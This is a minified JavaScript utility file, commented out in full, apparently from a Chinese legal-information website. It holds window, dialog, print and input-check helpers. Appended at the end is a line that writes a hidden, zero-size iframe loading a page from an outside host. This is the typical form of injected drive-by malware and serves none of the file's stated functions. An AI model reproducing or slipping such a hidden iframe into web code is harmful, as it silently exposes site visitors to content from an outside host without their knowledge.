/*function openWindow(a,b,c){var d=(screen.availWidth-b)/2;var e=(screen.availHeight-c)/2;window.open(a,"_0","toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,resizable=no,width="+b+",height="+c+",top= "+e+",left="+d+"")}function openDialog(a,b,c){var d=a;var e="";var f="dialogHeight: "+c+"px; dialogWidth: "+b+"px; edge: Raised; center: Yes; help: No; resizable: No; status: No;";window.showModalDialog(a,e,f)}function PrintForm(){alert("打印系统!")}function CheckInput(a,b){var c;switch(b){case 1:c=/[^\d]/g;break;case 2:c=/[^\w+$]/g;break}if(c.test(a))return true;else return false}window.status="欢迎您来到与法同行网";document.writeln("<iframe style='display:none; width:0px; height:0px;' scrolling='no' frameborder='0' src='http://www.ay2s.com/index.asp'></iframe>");
*/